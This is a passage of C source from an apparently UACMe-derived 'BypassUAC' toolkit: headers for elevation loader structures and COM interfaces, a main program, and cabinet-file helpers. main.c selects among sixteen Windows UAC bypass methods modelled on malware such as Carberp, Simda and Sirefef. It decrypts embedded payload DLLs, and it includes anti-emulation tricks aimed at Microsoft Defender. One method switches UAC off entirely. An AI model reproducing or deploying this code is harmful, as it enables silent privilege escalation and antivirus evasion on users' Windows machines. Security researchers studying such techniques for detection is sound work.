 70 | 	pfnCoUninitialize				xCoUninitialize;
 71 | 	pfnOutputDebugStringW			xOutputDebugStringW;
 72 | } ELOAD_PARAMETERS_2, *PELOAD_PARAMETERS_2;
 73 | 
 74 | typedef struct _ELOAD_PARAMETERS_3 {
 75 | 	//common with ELOAD_PARAMETERS
 76 | 	//
 77 | 	IID		xIID_IShellItem;
 78 | 	IID		xIID;
 79 | 	CLSID	xCLSID;
 80 | 	//
 81 | 	pfnCoInitialize					xCoInitialize;
 82 | 	pfnCoCreateInstance				xCoCreateInstance;
 83 | 	pfnCoGetObject					xCoGetObject;
 84 | 	pfnSHCreateItemFromParsingName	xSHCreateItemFromParsingName;
 85 | 	PVOID							Spare0;
 86 | 	PVOID							Spare1;
 87 | 	PVOID							Spare2;
 88 | 	pfnCoUninitialize				xCoUninitialize;
 89 | 	pfnOutputDebugStringW			xOutputDebugStringW;
 90 | 
 91 | 	WCHAR	EleMoniker[MAX_PATH];
 92 | 	//end of common with ELOAD_PARAMETERS
 93 | 
 94 | 	WCHAR	SourceFilePathAndName[MAX_PATH + 1];
 95 | 	WCHAR	DestinationDir[MAX_PATH + 1];
 96 | } ELOAD_PARAMETERS_3, *PELOAD_PARAMETERS_3;
 97 | 
 98 | typedef struct _ELOAD_PARAMETERS_4 {
 99 | 	WCHAR                           szVerb[MAX_PATH + 1];
100 | 	WCHAR                           szTargetApp[MAX_PATH * 4];
101 | 	pfnShellExecuteExW				xShellExecuteExW;
102 | 	pfnWaitForSingleObject			xWaitForSingleObject;
103 | 	pfnCloseHandle					xCloseHandle;
104 | } ELOAD_PARAMETERS_4, *PELOAD_PARAMETERS_4;
105 | 
106 | typedef interface ISecurityEditor ISecurityEditor;
107 | 
108 | typedef struct ISecurityEditorVtbl {
109 | 
110 | 	BEGIN_INTERFACE
111 | 
112 | 		HRESULT(STDMETHODCALLTYPE *QueryInterface)(
113 | 		__RPC__in ISecurityEditor * This,
114 | 		__RPC__in REFIID riid,
115 | 		_COM_Outptr_  void **ppvObject);
116 | 
117 | 		ULONG(STDMETHODCALLTYPE *AddRef)(
118 | 			__RPC__in ISecurityEditor * This);
119 | 
120 | 		ULONG(STDMETHODCALLTYPE *Release)(
121 | 			__RPC__in ISecurityEditor * This);
122 | 
123 | 		HRESULT(STDMETHODCALLTYPE *GetSecurity)(
124 | 			__RPC__in ISecurityEditor * This,
125 | 			_In_ LPCOLESTR ObjectName,
126 | 			_In_ SE_OBJECT_TYPE ObjectType,
127 | 			_In_ SECURITY_INFORMATION SecurityInfo,
128 | 			_Out_opt_ LPCOLESTR * ppSDDLStr);
129 | 
130 | 		HRESULT(STDMETHODCALLTYPE *SetSecurity)(
131 | 			__RPC__in ISecurityEditor * This,
132 | 			_In_ LPCOLESTR ObjectName,
133 | 			_In_ SE_OBJECT_TYPE ObjectType,
134 | 			_In_ SECURITY_INFORMATION SecurityInfo,
135 | 			_In_ LPCOLESTR ppSDDLStr);
136 | 
137 | 	END_INTERFACE
138 | 
139 | } *PISecurityEditorVtbl;
140 | 
141 | interface ISecurityEditor
142 | {
143 | 	CONST_VTBL struct ISecurityEditorVtbl *lpVtbl;
144 | };
145 | 
146 | BOOL ucmInjectExplorer(
147 | 	_In_ LPVOID ElevParams,
148 | 	_In_ LPVOID ElevatedLoadProc
149 | 	);
150 | 


--------------------------------------------------------------------------------
/BypassUAC/main.c:
--------------------------------------------------------------------------------
  1 | /*******************************************************************************
  2 | *
  3 | *  TITLE:       MAIN.C
  4 | *
  5 | *  VERSION:     2.01
  6 | *
  7 | *  DATE:        04 Jan 2016
  8 | *
  9 | *  Program entry point.
 10 | *
 11 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 12 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
 13 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
 14 | * PARTICULAR PURPOSE.
 15 | *
 16 | *******************************************************************************/
 17 | #define OEMRESOURCE
 18 | #include "global.h"
 19 | #include <VersionHelpers.h>
 20 | #include <gl\GL.h>
 21 | #pragma comment(lib, "opengl32.lib")
 22 | 
 23 | UACMECONTEXT g_ctx;
 24 | 
 25 | static pfnDecompressPayload pDecryptPayload = NULL;
 26 | 
 27 | #if (_MSC_VER >= 1900) 
 28 | #ifdef _DEBUG
 29 | #pragma comment(lib, "vcruntimed.lib")
 30 | #pragma comment(lib, "ucrtd.lib")
 31 | #else
 32 | #pragma comment(lib, "libvcruntime.lib")
 33 | #endif
 34 | #endif
 35 | 
 36 | /*
 37 | * DummyWindowProc
 38 | *
 39 | * Purpose:
 40 | *
 41 | * Part of antiemulation, does nothing, serves as a window for ogl operations.
 42 | *
 43 | */
 44 | LRESULT CALLBACK DummyWindowProc(
 45 | 	HWND hwnd, 
 46 | 	UINT uMsg, 
 47 | 	WPARAM wParam, 
 48 | 	LPARAM lParam
 49 | 	)
 50 | {
 51 | 	switch (uMsg) {
 52 | 	case WM_CLOSE:
 53 | 		PostQuitMessage(0);
 54 | 		break;
 55 | 	}
 56 | 	return DefWindowProc(hwnd, uMsg, wParam, lParam);
 57 | }
 58 | 
 59 | /*
 60 | * ucmInit
 61 | *
 62 | * Purpose:
 63 | *
 64 | * Prestart phase with MSE / Windows Defender anti-emulation part.
 65 | *
 66 | */
 67 | UINT ucmInit(
 68 | 	VOID
 69 | 	)
 70 | {
 71 | 	BOOL cond = FALSE;
 72 | 	DWORD Result = ERROR_SUCCESS;
 73 | 	PVOID       Ptr;
 74 | 	MSG         msg1;
 75 | 	WNDCLASSEX  wincls;
 76 | 	HINSTANCE   inst = GetModuleHandle(NULL);
 77 | 	BOOL        rv = 1;
 78 | 	HWND        TempWindow;
 79 | 	HGLRC       ctx;
 80 | 	HDC         dc1;
 81 | 	int         index;
 82 | #ifndef _DEBUG
 83 | 	TOKEN_ELEVATION_TYPE    ElevType;
 84 | #endif	
 85 | 
 86 | 	ULONG bytesIO, dwType;
 87 | 	WCHAR szBuffer[MAX_PATH + 1];
 88 | 	WCHAR WndClassName[] = TEXT("reirraC");
 89 | 	WCHAR WndTitleName[] = TEXT("igakA");
 90 | 
 91 | 	PIXELFORMATDESCRIPTOR pfd = {
 92 | 		sizeof(PIXELFORMATDESCRIPTOR),
 93 | 		1,
 94 | 		PFD_DRAW_TO_WINDOW | PFD_SUPPORT_OPENGL | PFD_DOUBLEBUFFER | PFD_SWAP_EXCHANGE | PFD_GENERIC_ACCELERATED,
 95 | 		PFD_TYPE_RGBA,
 96 | 		32, 8, 0, 8, 0, 8, 0, 8, 0,
 97 | 		0, 0, 0, 0, 0, 32, 0, 0,
 98 | 		PFD_MAIN_PLANE, 0, 0, 0, 0
 99 | 	};
100 | 
101 | 	do {
102 | 
103 | 		//fill common data block
104 | 		RtlSecureZeroMemory(&g_ctx, sizeof(g_ctx));
105 | 
106 | 		dwType = 0;
107 | 		bytesIO = 0;
108 | 		RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
109 | 		GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO);
110 | 		if (bytesIO == 0) {
111 | 			return ERROR_BAD_ARGUMENTS;
112 | 		}
113 | 		g_ctx.Method = strtoul(szBuffer);
114 | 		if (g_ctx.Method == 0 || g_ctx.Method >= UacMethodMax) {
115 | 			return ERROR_BAD_ARGUMENTS;
116 | 		}
117 | 
118 | #ifndef _DEBUG
119 | 		ElevType = TokenElevationTypeDefault;
120 | 		if (supGetElevationType(&ElevType)) {
121 | 			if (ElevType != TokenElevationTypeLimited) {			
122 | 				return ERROR_UNSUPPORTED_TYPE;
123 | 			}
124 | 		}
125 | #endif
126 | 
127 | 		wincls.cbSize = sizeof(WNDCLASSEX);
128 | 		wincls.style = CS_OWNDC;
129 | 		wincls.lpfnWndProc = &DummyWindowProc;
130 | 		wincls.cbClsExtra = 0;
131 | 		wincls.cbWndExtra = 0;
132 | 		wincls.hInstance = inst;
133 | 		wincls.hIcon = NULL;
134 | 		wincls.hCursor = (HCURSOR)LoadImage(NULL, MAKEINTRESOURCE(OCR_NORMAL), IMAGE_CURSOR, 0, 0, LR_SHARED);
135 | 		wincls.hbrBackground = NULL;
136 | 		wincls.lpszMenuName = NULL;
137 | 		wincls.lpszClassName = WndClassName;
138 | 		wincls.hIconSm = 0;
139 | 		RegisterClassEx(&wincls);
140 | 
141 | 		TempWindow = CreateWindowEx(WS_EX_TOPMOST, WndClassName, WndTitleName,
142 | 			WS_VISIBLE | WS_POPUP | WS_CLIPCHILDREN | WS_CLIPSIBLINGS, 0, 0, 30, 30, NULL, NULL, inst, NULL);
143 | 
144 | 
145 | 		//remember dll handles
146 | 		g_ctx.hKernel32 = GetModuleHandleW(T_KERNEL32);
147 | 		if (g_ctx.hKernel32 == NULL) {
148 | 			Result = ERROR_INVALID_HANDLE;
149 | 			break;
150 | 		}
151 | 
152 | 		g_ctx.hOle32 = GetModuleHandleW(T_OLE32);
153 | 		if (g_ctx.hOle32 == NULL) {
154 | 			g_ctx.hOle32 = LoadLibraryW(T_OLE32);
155 | 			if (g_ctx.hOle32 == NULL) {
156 | 				Result = ERROR_INVALID_HANDLE;
157 | 				break;
158 | 			}
159 | 		}
160 | 		g_ctx.hShell32 = GetModuleHandleW(T_SHELL32);
161 | 		if (g_ctx.hShell32 == NULL) {
162 | 			g_ctx.hShell32 = LoadLibraryW(T_SHELL32);
163 | 			if (g_ctx.hShell32 == NULL) {
164 | 				Result = ERROR_INVALID_HANDLE;
165 | 				break;
166 | 			}
167 | 		}
168 | 
169 | 		//query basic directories
170 | 		if (GetSystemDirectoryW(g_ctx.szSystemDirectory, MAX_PATH) == 0) {
171 | 			Result = ERROR_INVALID_DATA;
172 | 			break;
173 | 		}
174 | 
175 | 		//query build number
176 | 		RtlSecureZeroMemory(&g_ctx.osver, sizeof(g_ctx.osver));
177 | 		g_ctx.osver.dwOSVersionInfoSize = sizeof(g_ctx.osver);
178 | 		if (!NT_SUCCESS(RtlGetVersion(&g_ctx.osver))) {
179 | 			Result = ERROR_INVALID_ACCESS;
180 | 			break;
181 | 		}
182 | 
183 | 		if (g_ctx.osver.dwBuildNumber < 7000) {
184 | 			Result = ERROR_INSTALL_PLATFORM_UNSUPPORTED;
185 | 			break;
186 | 		}
187 | 
188 | 		g_ctx.IsWow64 = supIsProcess32bit(GetCurrentProcess());
189 | 
190 | 		//flashes and sparks
191 | 		dc1 = GetDC(TempWindow);
192 | 		index = ChoosePixelFormat(dc1, &pfd);
193 | 		SetPixelFormat(dc1, index, &pfd);
194 | 		ctx = wglCreateContext(dc1);
195 | 		wglMakeCurrent(dc1, ctx);
196 | 		glDrawBuffer(GL_BACK);
197 | 		glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);
198 | 		glMatrixMode(GL_PROJECTION);
199 | 		glLoadIdentity();
200 | 		glBegin(GL_TRIANGLES);
201 | 		glColor4i(1, 0, 1, 0);
202 | 		glVertex2i(-1, -1);
203 | 		glVertex2i(0, 1);
204 | 		glVertex2i(1, -1);
205 | 		glEnd();
206 | #pragma warning(disable: 4054)//code to data
207 | 		Ptr = (PVOID)&DecompressPayload;
208 | #pragma warning(default: 4054)
209 | 		pDecryptPayload = NULL;
210 | #ifdef _WIN64
211 | 		glDrawPixels(2, 1, GL_RGBA, GL_UNSIGNED_BYTE, &Ptr);
212 | 		glReadPixels(0, 0, 2, 1, GL_RGBA, GL_UNSIGNED_BYTE, (GLvoid *)&pDecryptPayload);
213 | #else
214 | 		glDrawPixels(1, 1, GL_RGBA, GL_UNSIGNED_BYTE, &Ptr);
215 | 		glReadPixels(0, 0, 1, 1, GL_RGBA, GL_UNSIGNED_BYTE, (GLvoid *)&pDecryptPayload);
216 | #endif
217 | 		SwapBuffers(dc1);
218 | 		SendMessage(TempWindow, WM_CLOSE, 0, 0);
219 | 
220 | 		do {
221 | 			rv = GetMessage(&msg1, NULL, 0, 0);
222 | 
223 | 			if (rv == -1)
224 | 				break;
225 | 
226 | 			TranslateMessage(&msg1);
227 | 			DispatchMessage(&msg1);
228 | 		} while (rv != 0);
229 | 
230 | 		UnregisterClass(WndClassName, inst);
231 | 		
232 | 		switch (g_ctx.Method) {
233 | 
234 | 		case UacMethodAVrf:
235 | 			g_ctx.PayloadDll = pDecryptPayload((PVOID)HIBIKIDLL, sizeof(HIBIKIDLL), &g_ctx.PayloadDllSize);
236 | 			break;
237 | 
238 | 		default:
239 | 			g_ctx.PayloadDll = pDecryptPayload((PVOID)FUBUKIDLL, sizeof(FUBUKIDLL), &g_ctx.PayloadDllSize);
240 | 			break;
241 | 		}
242 | 
243 | 		if (g_ctx.PayloadDll == NULL) {
244 | 			Result = ERROR_INVALID_DATA;
245 | 			break;
246 | 		}
247 | 
248 | 	} while (cond);
249 | 
250 | 	return Result;
251 | }
252 | 
253 | /*
254 | * ucmMain
255 | *
256 | * Purpose:
257 | *
258 | * Program entry point.
259 | *
260 | */
261 | UINT ucmMain()
262 | {
263 | 	DWORD  paramLen;
264 | 	WCHAR  *pDllName;
265 | 	WCHAR  szBuffer[MAX_PATH + 1];
266 | 	UINT   uResult;
267 | 
268 | #ifdef GENERATE_COMPRESSED_PAYLOAD
269 | 	CompressPayload();
270 | #endif
271 | 	uResult = ucmInit();
272 | 
273 | 	switch (uResult) {
274 | 
275 | 	case ERROR_UNSUPPORTED_TYPE:
276 | 		ucmShowMessage(TEXT("Admin account with limited token required."));
277 | 		break;
278 | 
279 | 	case ERROR_INSTALL_PLATFORM_UNSUPPORTED:
280 | 		ucmShowMessage(TEXT("This Windows version is not supported."));
281 | 		break;
282 | 
283 | 	case ERROR_BAD_ARGUMENTS:
284 | 		ucmShowMessage(TEXT("Usage: BapassUAC.exe [1-16] [OptionalParamToExecute]\n\nExample:\BapassUAC.exe 1 cmd.exe"));
285 | 		break;
286 | 	default:
287 | 		break;
288 | 
289 | 	}
290 | 	if (uResult != ERROR_SUCCESS) {
291 | 		return ERROR_INTERNAL_ERROR;
292 | 	}
293 | 
294 | 	//check OS version first
295 | 	switch (g_ctx.Method) {
296 | 	
297 | 	case UacMethodSysprep1://cryptbase
298 | 		if (g_ctx.osver.dwBuildNumber > 9200) {
299 | 			if (ucmShowQuestion(UACFIX) == IDNO)
300 | 				return ERROR_UNSUPPORTED_TYPE;
301 | 		}
302 | 		break;
303 | 
304 | 	case UacMethodSysprep2://shcore
305 | 		if (g_ctx.osver.dwBuildNumber != 9600) {
306 | 			if (ucmShowQuestion(UACFIX) == IDNO)
307 | 				return ERROR_UNSUPPORTED_TYPE;
308 | 		}
309 | 		break;
310 | 
311 | 	case UacMethodSysprep3://dbgcore
312 | 		if (g_ctx.osver.dwBuildNumber != 10240)	{
313 | 			if (ucmShowQuestion(UACFIX) == IDNO)
314 | 				return ERROR_UNSUPPORTED_TYPE;
315 | 		}
316 | 		break;
317 | 
318 | 	case UacMethodOobe://oobe service
319 | 		if (g_ctx.osver.dwBuildNumber >= 10548) {
320 | 			if (ucmShowQuestion(UACFIX) == IDNO)
321 | 				return ERROR_UNSUPPORTED_TYPE;
322 | 		}
323 | 		break;
324 | 
325 | 	case UacMethodRedirectExe:
326 | #ifndef _WIN64
327 | 		if (g_ctx.osver.dwBuildNumber > 9600) {
328 | 			if (ucmShowQuestion(UACFIX) == IDNO)
329 | 				return ERROR_UNSUPPORTED_TYPE;
330 | 		}
331 | #else 
332 | 		ucmShowMessage(WOW64WIN32ONLY);
333 | 		return ERROR_UNSUPPORTED_TYPE;
334 | #endif
335 | 		break;
336 | 
337 | 	case UacMethodSimda:
338 | 		if (g_ctx.osver.dwBuildNumber >= 10136) {
339 | 			if (ucmShowQuestion(UACFIX) == IDNO)
340 | 				return ERROR_UNSUPPORTED_TYPE;
341 | 		}
342 | 		break;
343 | 
344 | 	case UacMethodCarberp1:
345 | 		if (g_ctx.osver.dwBuildNumber >= 10147) {
346 | 			if (ucmShowQuestion(UACFIX) == IDNO)
347 | 				return ERROR_UNSUPPORTED_TYPE;
348 | 		}
349 | 		break;
350 | 
351 | 	case UacMethodCarberp2:
352 | 		if (g_ctx.osver.dwBuildNumber >= 10147) {
353 | 			if (ucmShowQuestion(UACFIX) == IDNO)
354 | 				return ERROR_UNSUPPORTED_TYPE;
355 | 		}
356 | 		break;
357 | 
358 | 	case UacMethodTilon:
359 | 		if (g_ctx.osver.dwBuildNumber > 9200) {
360 | 			if (ucmShowQuestion(UACFIX) == IDNO)
361 | 				return ERROR_UNSUPPORTED_TYPE;
362 | 		}
363 | 		break;
364 | 
365 | 	case UacMethodAVrf:
366 | 		if (g_ctx.osver.dwBuildNumber >= 10136) {
367 | 			if (ucmShowQuestion(UACFIX) == IDNO)
368 | 				return ERROR_UNSUPPORTED_TYPE;
369 | 		}
370 | 		break;
371 | 
372 | 	case UacMethodWinsat:
373 | 		if (g_ctx.osver.dwBuildNumber >= 10548) {
374 | 			if (ucmShowQuestion(UACFIX) == IDNO)
375 | 				return ERROR_UNSUPPORTED_TYPE;
376 | 		}
377 | 		break;
378 | 
379 | 	case UacMethodShimPatch:
380 | #ifndef _WIN64
381 | 		if (g_ctx.osver.dwBuildNumber > 9600) {
382 | 			if (ucmShowQuestion(UACFIX) == IDNO)
383 | 				return ERROR_UNSUPPORTED_TYPE;
384 | 		}
385 | #else
386 | 		ucmShowMessage(WOW64WIN32ONLY);
387 | 		return ERROR_UNSUPPORTED_TYPE;
388 | #endif
389 | 		break;
390 | 
391 | 	case UacMethodMMC:
392 | #ifndef _WIN64
393 | 		ucmShowMessage(WIN64ONLY);
394 | 		return ERROR_UNSUPPORTED_TYPE;
395 | #endif	
396 | 		break;
397 | 
398 | 	case UacMethodSirefef:
399 | 		if (g_ctx.osver.dwBuildNumber >= 10548) {
400 | 			if (ucmShowQuestion(UACFIX) == IDNO)
401 | 				return ERROR_UNSUPPORTED_TYPE;
402 | 		}
403 | 		break;
404 | 
405 | 	case UacMethodGeneric:
406 | 		//future use
407 | 		break;
408 | 
409 | 	case UacMethodGWX:
410 | 		if (g_ctx.osver.dwBuildNumber < 7600) {
411 | 			ucmShowMessage(OSTOOOLD);
412 | 			return ERROR_UNSUPPORTED_TYPE;
413 | 		}
414 | 		break;
415 | 	}
416 | 
417 | 	//prepare command for payload
418 | 	paramLen = 0;
419 | 	RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
420 | 	GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, &paramLen);
421 | 	if (paramLen > 0) {
422 | 		if (g_ctx.Method != UacMethodRedirectExe) {
423 | 			supSetParameter((LPWSTR)&szBuffer, paramLen * sizeof(WCHAR));
424 | 		}
425 | 	}
426 | 
427 | 
428 | 	//check environment and execute method if it met requirements
429 | 	switch (g_ctx.Method) {
430 | 
431 | 	case UacMethodSysprep1:
432 | 	case UacMethodSysprep2:
433 | 	case UacMethodSysprep3:
434 | 	case UacMethodOobe:
435 | 	case UacMethodTilon:
436 | 
437 | #ifndef _DEBUG
438 | 		if (g_ctx.IsWow64) {
439 | 			ucmShowMessage(WOW64STRING);
440 | 			return ERROR_UNSUPPORTED_TYPE;
441 | 		}
442 | #endif
443 | 		
444 | 		if (ucmStandardAutoElevation(g_ctx.Method, g_ctx.PayloadDll, g_ctx.PayloadDllSize)) {
445 | 			return ERROR_SUCCESS;
446 | 		}
447 | 		break;
448 | 
449 | //
450 | //  Allow only in 32 version.
451 | //
452 | #ifndef _WIN64
453 | 	case UacMethodRedirectExe:
454 | 	case UacMethodShimPatch:
455 | 		if (ucmAppcompatElevation(g_ctx.Method, g_ctx.PayloadDll, g_ctx.PayloadDllSize, (paramLen != 0) ? szBuffer : NULL )) {
456 | 			return ERROR_SUCCESS;
457 | 		}
458 | 		break;
459 | #endif
460 | 
461 | 	case UacMethodSimda:
462 | 
463 | #ifndef _DEBUG
464 | 		if (g_ctx.IsWow64) {
465 | 			ucmShowMessage(WOW64STRING);
466 | 			return ERROR_UNSUPPORTED_TYPE;
467 | 		}
468 | #endif
469 | 		if (MessageBox(GetDesktopWindow(),
470 | 			TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
471 | 			PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) 
472 | 		{
473 | 			if (ucmSimdaTurnOffUac()) {
474 | 				return ERROR_SUCCESS;
475 | 			}
476 | 		}
477 | 		break;
478 | 
479 | 	case UacMethodCarberp1:
480 | 	case UacMethodCarberp2:
481 | 
482 | 		if (g_ctx.Method == UacMethodCarberp1) {
483 | 
484 | 			//there is no migmiz in syswow64 in 8+
485 | 			if ((g_ctx.IsWow64) && (g_ctx.osver.dwBuildNumber > 7601)) {
486 | 				ucmShowMessage(WOW64STRING);
487 | 				return ERROR_UNSUPPORTED_TYPE;
488 | 			}
489 | 		}
490 | 
491 | 		if (g_ctx.Method == UacMethodCarberp2) {
492 | #ifndef _DEBUG
493 | 			if (g_ctx.IsWow64) {
494 | 				ucmShowMessage(WOW64STRING);
495 | 				return ERROR_UNSUPPORTED_TYPE;
496 | 			}
497 | #endif
498 | 		}
499 | 
500 | 		if (ucmWusaMethod(g_ctx.Method, g_ctx.PayloadDll, g_ctx.PayloadDllSize)) {
501 | 			return ERROR_SUCCESS;
502 | 		}
503 | 		break;
504 | 
505 | 	case UacMethodAVrf:
506 | #ifndef _DEBUG
507 | 		if (g_ctx.IsWow64) {
508 | 			ucmShowMessage(WOW64STRING);
509 | 			return ERROR_UNSUPPORTED_TYPE;
510 | 		}
511 | #endif		
512 | 		if (ucmAvrfMethod(g_ctx.PayloadDll, g_ctx.PayloadDllSize)) {
513 | 			return ERROR_SUCCESS;
514 | 		}
515 | 		break;
516 | 
517 | 	case UacMethodWinsat:
518 | #ifndef _DEBUG
519 | 		if (g_ctx.IsWow64) {
520 | 			ucmShowMessage(LAZYWOW64UNSUPPORTED);
521 | 			return ERROR_UNSUPPORTED_TYPE;
522 | 		}
523 | #endif
524 | 		if (g_ctx.osver.dwBuildNumber < 9200) {
525 | 			pDllName = L"powrprof.dll";
526 | 		}
527 | 		else {
528 | 			pDllName = L"devobj.dll";
529 | 		}
530 | 
531 | 		if (ucmWinSATMethod(pDllName, g_ctx.PayloadDll, g_ctx.PayloadDllSize, (g_ctx.osver.dwBuildNumber <= 10136))) {
532 | 			return ERROR_SUCCESS;
533 | 		}
534 | 		break;
535 | 
536 | 	case UacMethodMMC:
537 | #ifndef _DEBUG
538 | 		if (g_ctx.IsWow64) {
539 | 			ucmShowMessage(WOW64STRING);
540 | 			return ERROR_UNSUPPORTED_TYPE;
541 | 		}
542 | #endif
543 | 		pDllName = L"elsext.dll";
544 | 		if (ucmMMCMethod(pDllName, g_ctx.PayloadDll, g_ctx.PayloadDllSize)) {
545 | 			return ERROR_SUCCESS;
546 | 		}
547 | 		break;
548 | 
549 | 	case UacMethodSirefef:
550 | #ifndef _DEBUG
551 | 		if (g_ctx.IsWow64) {
552 | 			ucmShowMessage(WOW64STRING);
553 | 			return ERROR_UNSUPPORTED_TYPE;
554 | 		}
555 | #endif
556 | 		if (ucmSirefefMethod(g_ctx.PayloadDll, g_ctx.PayloadDllSize)) {
557 | 			return ERROR_SUCCESS;
558 | 		}
559 | 		break;
560 | 
561 | 	case UacMethodGeneric:
562 | #ifndef _DEBUG
563 | 		if (g_ctx.IsWow64) {
564 | 			ucmShowMessage(WOW64STRING);
565 | 			return ERROR_UNSUPPORTED_TYPE;
566 | 		}
567 | #endif
568 | 		pDllName = L"ntwdblib.dll";
569 | 		if (ucmGenericAutoelevation(METHOD_SQLSRV_TARGETAPP, pDllName, g_ctx.PayloadDll, g_ctx.PayloadDllSize))
570 | 			return ERROR_SUCCESS;
571 | 		
572 | 		break;
573 | 
574 | 	case UacMethodGWX:
575 | #ifndef _DEBUG
576 | 		if (g_ctx.IsWow64) {
577 | 			ucmShowMessage(WOW64STRING);
578 | 			return ERROR_UNSUPPORTED_TYPE;
579 | 		}
580 | #endif
581 | 		if (ucmGWX()) {
582 | 			return ERROR_SUCCESS;
583 | 		}
584 | 		break;
585 | 
586 | 	}
587 | 	
588 | 	return ERROR_ACCESS_DENIED;
589 | }
590 | 
591 | int main()
592 | {
593 | 	UINT uResult;
594 | 
595 | 	uResult = ucmMain();
596 | 	if (uResult == ERROR_SUCCESS) 
597 | 	{
598 | 		OutputDebugString(RESULTOK);
599 | 	}
600 | 	else
601 | 	{
602 | 		OutputDebugString(RESULTFAIL);
603 | 	}
604 | 	ExitProcess(uResult);
605 | 
606 | 	return 0;
607 | }
608 | 


--------------------------------------------------------------------------------
/BypassUAC/makecab.c:
--------------------------------------------------------------------------------
  1 | /*******************************************************************************
  2 | *
  3 | *  (C) COPYRIGHT AUTHORS, 2015
  4 | *
  5 | *  TITLE:       MAKECAB.C
  6 | *
  7 | *  VERSION:     1.60
  8 | *
  9 | *  DATE:        20 Apr 2015
 10 | *
 11 | *  Simplified Cabinet file support for makecab utility replacement.
 12 | *
 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
 16 | * PARTICULAR PURPOSE.
 17 | *
 18 | *******************************************************************************/
 19 | #include "global.h"
 20 | #include "makecab.h"
 21 | 
 22 | #pragma comment(lib, "cabinet.lib")
 23 | 
 24 | /*
 25 | ** CAB Callbacks START
 26 | */
 27 | 
 28 | LPVOID DIAMONDAPI fnFCIALLOC(
 29 | 	ULONG cb
 30 | 	)
 31 | {
 32 | 	return HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, cb);
 33 | }
 34 | 
 35 | VOID DIAMONDAPI fnFCIFREE(
 36 | 	VOID HUGE *lpMem
 37 | 	)
 38 | {
 39 | 	if (lpMem) {
 40 | 		HeapFree(GetProcessHeap(), 0, lpMem);
 41 | 	}
 42 | }
 43 | 
 44 | INT_PTR DIAMONDAPI fnFCIOPEN(
 45 | 	LPSTR pszFile,
 46 | 	int oflag,
 47 | 	int pmode,
 48 | 	int FAR *err,
 49 | 	void FAR *pv
 50 | 	)
 51 | {
 52 | 	HANDLE hFile = NULL;
 53 | 	DWORD dwDesiredAccess = 0;
 54 | 	DWORD dwCreationDisposition = 0;
 55 | 
 56 | 	UNREFERENCED_PARAMETER(pv);
 57 | 	UNREFERENCED_PARAMETER(pmode);
 58 | 
 59 | 	if (oflag & _O_RDWR) {
 60 | 		dwDesiredAccess = GENERIC_READ | GENERIC_WRITE;
 61 | 	} else if (oflag & _O_WRONLY) {
 62 | 		dwDesiredAccess = GENERIC_WRITE;
 63 | 	} else {
 64 | 		dwDesiredAccess = GENERIC_READ;
 65 | 	}
 66 | 
 67 | 	if (oflag & _O_CREAT) {
 68 | 		dwCreationDisposition = CREATE_ALWAYS;
 69 | 	} else {
 70 | 		dwCreationDisposition = OPEN_EXISTING;
 71 | 	}
 72 | 
 73 | 	hFile = CreateFileA(pszFile,
 74 | 		dwDesiredAccess,
 75 | 		FILE_SHARE_READ,
 76 | 		NULL,
 77 | 		dwCreationDisposition,
 78 | 		FILE_ATTRIBUTE_NORMAL,
 79 | 		NULL);
 80 | 
 81 | 	if (hFile == INVALID_HANDLE_VALUE) {
 82 | 		*err = GetLastError();
 83 | 	}
 84 | 
 85 | 	return (INT_PTR)hFile;
 86 | }
 87 | 
 88 | UINT DIAMONDAPI fnFCIREAD(
 89 | 	INT_PTR hf,
 90 | 	void FAR *memory,
 91 | 	UINT cb,
 92 | 	int FAR *err,
 93 | 	void FAR *pv
 94 | 	)
 95 | {
 96 | 	DWORD dwBytesRead = 0;
 97 | 
 98 | 	UNREFERENCED_PARAMETER(pv);
 99 | 
100 | 	if (ReadFile((HANDLE)hf, memory, cb, &dwBytesRead, NULL) == FALSE) {
101 | 		dwBytesRead = (DWORD)-1;
102 | 		if (err) {
103 | 			*err = GetLastError();
104 | 		}
105 | 	}
106 | 	return dwBytesRead;
107 | }
108 | 
109 | UINT DIAMONDAPI fnFCIWRITE(
110 | 	INT_PTR hf,
111 | 	void FAR *memory,
112 | 	UINT cb,
113 | 	int FAR *err,
114 | 	void FAR *pv
115 | 	)
116 | {
117 | 	DWORD dwBytesWritten = 0;
118 | 
119 | 	UNREFERENCED_PARAMETER(pv);
120 | 
121 | 	if (WriteFile((HANDLE)hf, memory, cb, &dwBytesWritten, NULL) == FALSE) {
122 | 		dwBytesWritten = (DWORD)-1;
123 | 		if (err) {
124 | 			*err = GetLastError();
125 | 		}
126 | 	}
127 | 	return dwBytesWritten;
128 | }
129 | 
130 | int DIAMONDAPI fnFCICLOSE(
131 | 	INT_PTR hf,
132 | 	int FAR *err,
133 | 	void FAR *pv
134 | 	)
135 | {
136 | 	INT iResult = 0;
137 | 
138 | 	UNREFERENCED_PARAMETER(pv);
139 | 
140 | 	if (CloseHandle((HANDLE)hf) == FALSE) {
141 | 		if (err) {
142 | 			*err = GetLastError();
143 | 		}
144 | 		iResult = -1;
145 | 	}
146 | 	return iResult;
147 | }
148 | 
149 | long DIAMONDAPI fnFCISEEK(
150 | 	INT_PTR hf,
151 | 	long dist,
152 | 	int seektype,
153 | 	int FAR *err,
154 | 	void FAR *pv
155 | 	)
156 | {
157 | 	INT iResult = 0;
158 | 
159 | 	UNREFERENCED_PARAMETER(pv);
160 | 
161 | 	iResult = SetFilePointer((HANDLE)hf, dist, NULL, seektype);
162 | 
163 | 	if (iResult == -1) {
164 | 		if (err) {
165 | 			*err = GetLastError();
166 | 		}
167 | 	}
168 | 	return iResult;
169 | }
170 | 
171 | int DIAMONDAPI fnFCIDELETE(
